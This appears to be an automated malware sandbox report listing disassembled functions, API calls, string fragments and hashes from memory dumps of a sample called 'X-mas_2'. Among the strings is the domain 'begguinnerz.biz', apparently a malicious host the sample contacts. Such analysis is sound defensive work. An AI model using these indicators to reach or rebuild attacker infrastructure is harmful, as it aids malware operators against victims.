Opcode ID: 5ea17ae4b62bb8ab2831fb3a52aae80bad02e721a050725aa913254c0d2a0a32
Instruction ID: 473ffa93bf32397dfefcabaa32d4a7125e685679702b30be9a5d0b3b2b525fb1
Opcode Fuzzy Hash: 5ea17ae4b62bb8ab2831fb3a52aae80bad02e721a050725aa913254c0d2a0a32
Instruction Fuzzy Hash: B1C080542D02509BF51C87118C0ED17755E97C7F45700401FD511057E7C5A000058A94

Function 0040C660 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C673

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 413737427438556d5fa7e0556733acb83c5b4eac6897b874756f3227497564db
Instruction ID: a6b7534e426cd29cb0e1e31caee4a3ce77516a25d8fe1d9d75e6d40f069d1f8c
Opcode Fuzzy Hash: 413737427438556d5fa7e0556733acb83c5b4eac6897b874756f3227497564db
Instruction Fuzzy Hash: CBE0C236E506442BD6046B1CDC47F8A3A1AC3C3726F4C8234A550CA2C5E938B910C15E

Function 0040C69E Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C6B0

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 4b317f61b4ed6c220f3feb26dab4a859da40cf1549f870816065b6807c59d919
Instruction ID: ca338ed000cba09c134a9ecbf479b52692d88648cc8417c010cf118771328cdf
Opcode Fuzzy Hash: 4b317f61b4ed6c220f3feb26dab4a859da40cf1549f870816065b6807c59d919
Instruction Fuzzy Hash: 7DE05E39BD47406BFA385B08DC13F4422129386F21F388224B310EE7D9C8A8B501420C

Function 0043E6A5 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0043E6A5

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: b48e2f79c62e4811e334b2433c8222d9ec698c1a03c7fb9f9c38adda7ff18471
Instruction ID: eb5cd64e0cd090f695d5de900f82e4eebcc02a3ea27d0b2ee91ac1c0039229b8
Opcode Fuzzy Hash: b48e2f79c62e4811e334b2433c8222d9ec698c1a03c7fb9f9c38adda7ff18471
Instruction Fuzzy Hash: 2BC012EC9084808BC248EB12EC4252A3B5EAA8A209B049038D80B02B23E9306805968A

Function 0043BCB0 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,00000000,0043D8F6,?,?,?,00000000,0040B40D,00000000,00000000), ref: 0043BCCE

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 85ba4f6bb3df290ded2e1b23f993eb3f5d5984f7020326030569786283a59457
Instruction ID: 6c6d5fcf156c4dc9181b7fd85535f9ef3000d663acf77e4cc9904710c0b9b036
Opcode Fuzzy Hash: 85ba4f6bb3df290ded2e1b23f993eb3f5d5984f7020326030569786283a59457
Instruction Fuzzy Hash: AED01231405122EBC7241F18FD06B873B64DF0A321F030472B8006B071C664EC519AD8

Function 0043BC90 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,AC36FDA1,00408797,2D2C008A), ref: 0043BCA0

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b3415836e398222536a54de0d850da02531c529426d1bee4289f1127ff9466bd
Instruction ID: 28c2b2b5d3f1f64fcd0aca9316f6b1f640d95bbb8965ee836e226e74b875d2a4
Opcode Fuzzy Hash: b3415836e398222536a54de0d850da02531c529426d1bee4289f1127ff9466bd
Instruction Fuzzy Hash: DBC09B31445121ABC6142B15FD05FC67F64DF45355F114066B40467073C770AC41D6D8

Function 00510465 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005104B6

Memory Dump Source

Source File: 00000000.00000002.2578235069.0000000000510000.00000040.00001000.00020000.00000000.sdmp, Offset: 00510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_X-mas_2.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 563d2eef1471619667ac727b4ad68506171c82db0d8c7e723557f244e225e1e6
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: E6112D79A40208EFDB01DF98C985E98BFF5AF08350F058094F9489B362D375EA90DF80

Non-executed Functions

Function 00436DB2 Relevance: 37.8, Strings: 30, Instructions: 257COMMON

Download Yara Rule

Strings

E, xrefs: 00436E78
m, xrefs: 00436E18
;, xrefs: 00436DCC
q, xrefs: 00436E48
c, xrefs: 00436E10
e, xrefs: 00436DF8
g, xrefs: 00436E00
J, xrefs: 00436EAC
I, xrefs: 00436EA8
K, xrefs: 00436EB0
;, xrefs: 00436DE4
s, xrefs: 00436E50
C, xrefs: 00436E90
o, xrefs: 00436E20
i, xrefs: 00436E28
}, xrefs: 00436E58
O, xrefs: 00436EA0
A, xrefs: 00436E88
k, xrefs: 00436E30
y, xrefs: 00436E68
-, xrefs: 00436DEC
u, xrefs: 00436E38
G, xrefs: 00436E80
{, xrefs: 00436E70
/, xrefs: 00436DD4
w, xrefs: 00436E40
~, xrefs: 00436DDC
M, xrefs: 00436E98
a, xrefs: 00436E08
8, xrefs: 00436DC4

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: -$/$8$;$;$A$C$E$G$I$J$K$M$O$a$c$e$g$i$k$m$o$q$s$u$w$y${$}$~
API String ID: 0-1589385449
Opcode ID: 08dd65442de94eabfc3cdf6d35326c8f72eb4104f2c4c18c14e31ef637717d18
Instruction ID: 1b177812bac92343aee33b27717da1fbbd16d72b67d831a1239cd13586a5dfd8
Opcode Fuzzy Hash: 08dd65442de94eabfc3cdf6d35326c8f72eb4104f2c4c18c14e31ef637717d18
Instruction Fuzzy Hash: 28B1A2616087D18ED726CE3C88883467F911B66224F1D83E9D8F99F3DBC2A9C946C365

Function 02117019 Relevance: 37.8, Strings: 30, Instructions: 257COMMON

Download Yara Rule

Strings

O, xrefs: 02117107
;, xrefs: 02117033
A, xrefs: 021170EF
w, xrefs: 021170A7
/, xrefs: 0211703B
c, xrefs: 02117077
J, xrefs: 02117113
i, xrefs: 0211708F
q, xrefs: 021170AF
u, xrefs: 0211709F
I, xrefs: 0211710F
G, xrefs: 021170E7
;, xrefs: 0211704B
8, xrefs: 0211702B
K, xrefs: 02117117
{, xrefs: 021170D7
k, xrefs: 02117097
e, xrefs: 0211705F
C, xrefs: 021170F7
-, xrefs: 02117053
m, xrefs: 0211707F
g, xrefs: 02117067
~, xrefs: 02117043
E, xrefs: 021170DF
y, xrefs: 021170CF
a, xrefs: 0211706F
o, xrefs: 02117087
M, xrefs: 021170FF
}, xrefs: 021170BF
s, xrefs: 021170B7

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: -$/$8$;$;$A$C$E$G$I$J$K$M$O$a$c$e$g$i$k$m$o$q$s$u$w$y${$}$~
API String ID: 0-1589385449
Opcode ID: 08dd65442de94eabfc3cdf6d35326c8f72eb4104f2c4c18c14e31ef637717d18
Instruction ID: 48e0d532acd72d0d00fd5832454916e7a8acecef44ef3f3c126ef84420b16b04
Opcode Fuzzy Hash: 08dd65442de94eabfc3cdf6d35326c8f72eb4104f2c4c18c14e31ef637717d18
Instruction Fuzzy Hash: 8AB192216087D18ED726CE3C88883467F915B66224F1D83E9D8F99F3DBC3A9C946C365

Function 00433960 Relevance: 34.1, APIs: 1, Strings: 18, Instructions: 837COMMON

Download Yara Rule

APIs

GetObjectW.GDI32 ref: 004339F5

Strings

4KC, xrefs: 00433EC9
FQC, xrefs: 00433E45
gQC, xrefs: 00433FE7
%MC, xrefs: 0043403F
EC, xrefs: 004340D9
}LC, xrefs: 00434131
;JC, xrefs: 00433E87
JHC, xrefs: 00433EDF
nOC, xrefs: 00433DAB
xPC, xrefs: 00433CFB
%*+(, xrefs: 00433AAF
$IC, xrefs: 00433EF5
MOC, xrefs: 004340EF
NRC, xrefs: 00433C4B
)OC, xrefs: 00433BF3
(, xrefs: 004339FB
JC, xrefs: 00433CE5
LC, xrefs: 00433F4D

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: Object
String ID: $IC$%*+($%MC$($)OC$4KC$;JC$FQC$JHC$MOC$NRC$gQC$nOC$xPC$}LC$EC$JC$LC
API String ID: 2936123098-1372895061
Opcode ID: 83f85164f53318fb957040d32909a50b7653dd08b5524637615f1529882b32b1
Instruction ID: 36275d4299c1cc8a6f4b0a2dda9d59d0b137285972a6756889d8cf952a04f1ae
Opcode Fuzzy Hash: 83f85164f53318fb957040d32909a50b7653dd08b5524637615f1529882b32b1
Instruction Fuzzy Hash: DF82A2F0E163249FDB998F18DC51B9ABBF9AB49744F2040DEA00DE7350CB761A818F59

Function 02118AC7 Relevance: 28.7, APIs: 8, Strings: 8, Instructions: 666memorycomCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(0044368C,00000000,00000001,0044367C), ref: 02118D4E
SysAllocString.OLEAUT32(k2`0), ref: 02118DC7
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02118E04
SysAllocString.OLEAUT32(07B705B3), ref: 02118E51
SysAllocString.OLEAUT32(09C50FBD), ref: 02118F14
VariantInit.OLEAUT32(EFEEEDF4), ref: 02118F83
VariantClear.OLEAUT32(?), ref: 021190F6
SysFreeString.OLEAUT32(00000000), ref: 0211912D

Strings

]E, xrefs: 02118E93
k2`0, xrefs: 02118DC2, 02118DC6
x;, xrefs: 02118E9B
p=)u, xrefs: 02118F83
S, xrefs: 02118E8B
]E, xrefs: 021192C9
b>c<, xrefs: 02118D64
,./,, xrefs: 02118BAE

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID: String$Alloc$Variant$BlanketClearCreateFreeInitInstanceProxy
String ID: ,./,$S$]E$]E$b>c<$k2`0$p=)u$x;
API String ID: 2775254435-1925592008
Opcode ID: 1b9558a094cbc51ef7ad8de07ac57e9da7b309c5d51250fedc0cab29ea1a42e1
Instruction ID: 1188d39d84987ef86303cd717da8b7317805bb8e1ac1ef797335288640e78526
Opcode Fuzzy Hash: 1b9558a094cbc51ef7ad8de07ac57e9da7b309c5d51250fedc0cab29ea1a42e1
Instruction Fuzzy Hash: E8221FB66483419BD310CF28C894BABBBE5FFC5314F19892DE5A59B2A0D735D805CB82

Function 0040ED75 Relevance: 16.5, APIs: 1, Strings: 8, Instructions: 701COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(?), ref: 0040F4B9

Strings

H, xrefs: 0040F081
j, xrefs: 0040F231
9, xrefs: 0040F3BD
2, xrefs: 0040F2F2
H, xrefs: 0040EEFE
7, xrefs: 0040EF5D
v, xrefs: 0040F1C4
V, xrefs: 0040F302

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 2$7$9$H$H$V$j$v
API String ID: 237503144-1978986865
Opcode ID: 4be2ad93ad263aa24791d851425d7f447bfb02ac2ebeaf19bb492b4805c9857a
Instruction ID: 82d8f7b26a8b2fa1bbcf6840c7d4f9747383a6517706711a2926001e1f175bd0
Opcode Fuzzy Hash: 4be2ad93ad263aa24791d851425d7f447bfb02ac2ebeaf19bb492b4805c9857a
Instruction Fuzzy Hash: A452AF3250C7908BD3249B38C4553AFBBE1ABD5324F198E7EE8D9A33C2D67889458747

Function 020EEFDC Relevance: 16.5, APIs: 1, Strings: 8, Instructions: 701COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(?), ref: 020EF720

Strings

H, xrefs: 020EF165
j, xrefs: 020EF498
9, xrefs: 020EF624
7, xrefs: 020EF1C4
H, xrefs: 020EF2E8
2, xrefs: 020EF559
v, xrefs: 020EF42B
V, xrefs: 020EF569

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: 2$7$9$H$H$V$j$v
API String ID: 237503144-1978986865
Opcode ID: 20b63d8c54693887097b1016f22a7a7917165b1edb064197a262f459610011b3
Instruction ID: da4206be7a4b19c3b6513f43c3de1d93faba54b8966614798a3c1c0d200b1d2b
Opcode Fuzzy Hash: 20b63d8c54693887097b1016f22a7a7917165b1edb064197a262f459610011b3
Instruction Fuzzy Hash: 3152B17250C7918FD7249B3884453AFBBE1ABC5324F098E6ED8DAD3782D6788941DB43

Function 00416F8D Relevance: 15.1, APIs: 4, Strings: 4, Instructions: 1114COMMON

Download Yara Rule

Strings

bxA, xrefs: 00417857
S,3!, xrefs: 00417095
@AF, xrefs: 004178B8
A, xrefs: 00417053

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: A$S,3!$bxA$@AF
API String ID: 0-2069903589
Opcode ID: 51a7bc412986f8b3ea5974b480de9a556fa70d4e40814ebbc0f959896439f117
Instruction ID: 6ded76c8cc6ff0f80e96e1d1ae2300ae6fa5ef525a8552055949680e93883b28
Opcode Fuzzy Hash: 51a7bc412986f8b3ea5974b480de9a556fa70d4e40814ebbc0f959896439f117
Instruction Fuzzy Hash: FF72357150C3418BD324CF28C8907ABB7F2EF96314F19896EE4C587392E7398985CB96

Function 021012C7 Relevance: 14.3, Strings: 11, Instructions: 575COMMON

Download Yara Rule

Strings

?, xrefs: 021015A1
B, xrefs: 02101592
@, xrefs: 0210159C
T, xrefs: 02101529
W, xrefs: 02101524
1, xrefs: 021015AB
,, xrefs: 0210189C
!@, xrefs: 021012FD
=, xrefs: 02101597
V, xrefs: 0210151F
0, xrefs: 021015A6

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: !@$,$0$1$=$?$@$B$T$V$W
API String ID: 0-2565976686
Opcode ID: 3a874c6243b955a1c8b93121c47ecd7f0747866ba4cf9dd931e787a028fd03b2
Instruction ID: ee7d4add0f45a7307b53f9a7501dcd7b560120d701d301e84e5fc33198705872
Opcode Fuzzy Hash: 3a874c6243b955a1c8b93121c47ecd7f0747866ba4cf9dd931e787a028fd03b2
Instruction Fuzzy Hash: 28329E71A4C7809FD3288F68C4903AFBBE2AB85314F19892DE5DA873D1D7F98545CB42

Function 0040AD90 Relevance: 14.2, Strings: 11, Instructions: 485COMMON

Download Yara Rule

Strings

fRnP, xrefs: 0040B041
'J*H, xrefs: 0040B02D
:8, xrefs: 0040B005
n^d\, xrefs: 0040B04B
^*^(, xrefs: 0040AFDD
uBc@, xrefs: 0040B019
7V>T, xrefs: 0040B037
I.Q,, xrefs: 0040AFD3
cfgd, xrefs: 0040B05F
oZdX, xrefs: 0040B055
FuD, xrefs: 0040B00F

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: FuD$:8$'J*H$7V>T$I.Q,$^*^($cfgd$fRnP$n^d\$oZdX$uBc@
API String ID: 0-4178537825
Opcode ID: 0ab402fb4809c95dc4027289a1b8894fb3f44387b0cf046cf4c9e6df90fd333a
Instruction ID: bcbedf8eb0a07792cc22a0f8fb5d0594b8c224fc694cc013ea00b116edda161a
Opcode Fuzzy Hash: 0ab402fb4809c95dc4027289a1b8894fb3f44387b0cf046cf4c9e6df90fd333a
Instruction Fuzzy Hash: 0002AAB5200B00CFD3248F69D891797BBF5FB45314F058A2DE5AA8BBA0C7B8A415CF95

Function 0042238D Relevance: 13.0, Strings: 10, Instructions: 549COMMON

Download Yara Rule

Strings

begguinnerz.biz, xrefs: 0042281F
(99#, xrefs: 004224B7
~|, xrefs: 00422736
?', xrefs: 004224CF
"0B, xrefs: 00423016
%<$, xrefs: 004224BF
-A+, xrefs: 004224AF
Z_-c, xrefs: 004225A0
OIE{, xrefs: 00422588
gM, xrefs: 0042252D

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: "0B$%<$$(99#$OIE{$Z_-c$begguinnerz.biz$gM$-A+$~|$?'
API String ID: 0-3659882310
Opcode ID: 1a2107a0d9ca9d91116f4215fd163885d8c2ef582804c35b4f29d4efd173d59b
Instruction ID: 5c5e0a10dac633df7a7eb912dad582696f6b243f8df0ab356ae229ec7ebc779d
Opcode Fuzzy Hash: 1a2107a0d9ca9d91116f4215fd163885d8c2ef582804c35b4f29d4efd173d59b
Instruction Fuzzy Hash: D30279726083919FD318CF25D89176BBBE2FBD2314F588A6CE4D18B395D7788805CB86

Function 004111E9 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 499COMMON

Download Yara Rule

Strings

f, xrefs: 0041175C
u, xrefs: 004115C5
}, xrefs: 00411535
?, xrefs: 004113E9
(, xrefs: 004116CF

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: ($?$f$u$}
API String ID: 0-3561895482
Opcode ID: 034806d3cc72206703f70723c548ba8ea1711a660e6f03707adc4ef9bcdfc4e3
Instruction ID: 86e3bcde5e116734b7454ff0522683787c5f8ed0e2df54b8e8f55331097e388c
Opcode Fuzzy Hash: 034806d3cc72206703f70723c548ba8ea1711a660e6f03707adc4ef9bcdfc4e3
Instruction Fuzzy Hash: B212A371A0D7808BD324DF39C4813AFBBE1ABD5314F198A2FE5D997391D63889418B47

Function 004237D0 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 431COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 004238A8
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,6A195A3A), ref: 0042394C

Strings

n`fn, xrefs: 004253D5
QVTH, xrefs: 004253AC
]VWC, xrefs: 004253A4
52, xrefs: 00423856
lnmh, xrefs: 004253BF

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 52$QVTH$]VWC$lnmh$n`fn
API String ID: 237503144-3964871452
Opcode ID: f42c4c6db4055bdca425bc9ce26f544c9401cc625d8d536d0403780354460537
Instruction ID: 3b8b4807c8318ae77837d9a5b010143032c821d60a60d601bdcb57454f2de873
Opcode Fuzzy Hash: f42c4c6db4055bdca425bc9ce26f544c9401cc625d8d536d0403780354460537
Instruction Fuzzy Hash: 2FE1457160C3518FD720CF68D8917ABBBE1EB85314F444A3EF99587381D3B89906CB9A

Function 021026DE Relevance: 11.5, Strings: 9, Instructions: 288COMMON

Download Yara Rule

Strings

Z_-c, xrefs: 02102807
-A+, xrefs: 02102716
begguinnerz.biz, xrefs: 02102A86
OIE{, xrefs: 021027EF
%<$, xrefs: 02102726
?', xrefs: 02102736
gM, xrefs: 02102794
(99#, xrefs: 0210271E
~|, xrefs: 0210299D

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: %<$$(99#$OIE{$Z_-c$begguinnerz.biz$gM$-A+$~|$?'
API String ID: 0-2098970515
Opcode ID: 0d26c01c40e7a9475785b11e477d36e5dba8bb9a297d2a8001c865f4b61546a2
Instruction ID: 91c74ee9c97dafc10b9c2aa6b71f4edf65afcf4799576ff7bf68be22c05508da
Opcode Fuzzy Hash: 0d26c01c40e7a9475785b11e477d36e5dba8bb9a297d2a8001c865f4b61546a2
Instruction Fuzzy Hash: CC91DEB444D3D08FD3258F25889065BBFE1AFD2208F18999CE4D18B2A5C7B9840ACF97

Function 00432FE0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00433029
GetSystemMetrics.USER32 ref: 00433039

Strings

C7C, xrefs: 004331B6
)6C, xrefs: 00433203
, xrefs: 00433126
Y8C, xrefs: 004331E2

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID: MetricsSystem
String ID: $)6C$C7C$Y8C
API String ID: 4116985748-1654261340
Opcode ID: 5c122eb9c0143f1b49a1e8f4bb7b68f4f6dba1365be09ef1174e0909afcf80c5
Instruction ID: 4b006a6d5d8b16d53f58adea831d835725ce84f357d2a915258799e4b83f44bd
Opcode Fuzzy Hash: 5c122eb9c0143f1b49a1e8f4bb7b68f4f6dba1365be09ef1174e0909afcf80c5
Instruction Fuzzy Hash: 5E817CB45193808FE360DF25C58879EBBE0BB85348F508D2EE4D88B350DBB89549CF5A

Function 00409140 Relevance: 10.4, Strings: 8, Instructions: 415COMMON

Download Yara Rule

Strings

uP, xrefs: 00409286
2&!w, xrefs: 0040915D
IIMC, xrefs: 00409266
T##", xrefs: 00409512
yt, xrefs: 0040919D
T##", xrefs: 0040940E
EW4, xrefs: 004092F1
O!);, xrefs: 00409165

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: 2&!w$EW4$IIMC$O!);$T##"$T##"$uP$yt
API String ID: 0-2143932533
Opcode ID: 09effc1b13daa91b72845bbbe66f33b8a5e808bbdc37d5409809ad00b593fd89
Instruction ID: b7e6f6c2e259c59c372040f3070f569a967029d4438ee1149a109cc5271046c8
Opcode Fuzzy Hash: 09effc1b13daa91b72845bbbe66f33b8a5e808bbdc37d5409809ad00b593fd89
Instruction Fuzzy Hash: 64C1147160C3918AD715CF39845036BBFE1AB96314F18896EE8D59B3C3D23DC90AC756

Function 020E93A7 Relevance: 10.4, Strings: 8, Instructions: 415COMMON

Download Yara Rule

Strings

O!);, xrefs: 020E93CC
yt, xrefs: 020E9404
IIMC, xrefs: 020E94CD
T##", xrefs: 020E9675
uP, xrefs: 020E94ED
2&!w, xrefs: 020E93C4
T##", xrefs: 020E9779
EW4, xrefs: 020E9558

Memory Dump Source

Source File: 00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20e0000_X-mas_2.jbxd

Yara matches

Similarity

API ID:
String ID: 2&!w$EW4$IIMC$O!);$T##"$T##"$uP$yt
API String ID: 0-2143932533
Opcode ID: 09effc1b13daa91b72845bbbe66f33b8a5e808bbdc37d5409809ad00b593fd89
Instruction ID: e85fec303cbe6e2444fa23f341a825289713ef3595755ef8f6cc4fca7c493c04
Opcode Fuzzy Hash: 09effc1b13daa91b72845bbbe66f33b8a5e808bbdc37d5409809ad00b593fd89
Instruction Fuzzy Hash: 65C1257160C3D18ED716CF29845076BBFE1AF92208F18896EE4D68B782D339C54AD752

Function 00438040 Relevance: 10.2, Strings: 8, Instructions: 194COMMON

Download Yara Rule

Strings

W, xrefs: 0043815C
R, xrefs: 00438161
<, xrefs: 004380E7
9, xrefs: 004380EC
&, xrefs: 004380E2
b, xrefs: 00438166
T, xrefs: 0043816B
%, xrefs: 004380F1

Memory Dump Source

Source File: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2578072203.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_X-mas_2.jbxd

Similarity

API ID:
String ID: %$&$9$<$R$T$W$b
API String ID: 0-3780034300
Opcode ID: 1461b86cfa4d3767ede56ba77eb50cf2841e928c2e72e09b72740e390ede6aa9
Instruction ID: 26f6469176a43b47c6e288f4693b2497bb05b8a0a051c4656522d96c8d770806
Opcode Fuzzy Hash: 1461b86cfa4d3767ede56ba77eb50cf2841e928c2e72e09b72740e390ede6aa9
Instruction Fuzzy Hash: 10719F2250C7C28AD3128A7C484425BEFD25BE7234F2D9FADF4E5873D2C56AC50A9367

Function 021182A7 Relevance: 10.2, Strings: 8, Instructions: 194COMMON

Download Yara Rule

Strings

W, xrefs: 021183C3
9, xrefs: 02118353
<, xrefs: 0211834E
T, xrefs: 021183D2
b, xrefs: 021183CD
&, xrefs: 02118349
R, xrefs: 021183C8
%, xrefs: 02118358

Memory Dump Source

